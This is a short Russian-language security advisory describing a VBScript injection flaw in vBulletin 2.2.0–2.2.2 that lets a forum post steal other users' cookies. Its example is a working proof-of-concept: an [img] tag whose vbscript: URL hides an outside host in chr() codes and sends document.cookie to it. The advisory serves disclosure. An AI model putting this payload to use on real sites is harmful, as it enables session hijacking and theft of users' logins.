Security Lab

Внедрение VBS кода в vBulletin

Дата публикации:22.03.2002
Всего просмотров:2712
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

vBulletin – Web основанная система BBS от Jelsoft Enterprises.

Найденная уязвимость позволяет внедрять VBS код в тело сообщения. Злонамеренный сценарий будет выполнен в контексте сайта, использующего уязвимую версию vBulletin. Уязвимость позволяет злонамеренному пользователю перехватывать опознавательные данные другого пользователя, основанные на cookie.
Уязвимость найдена в Jelsoft vBulletin 2.2.0-2.2.2
Пример:
[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]

Ссылки: Источник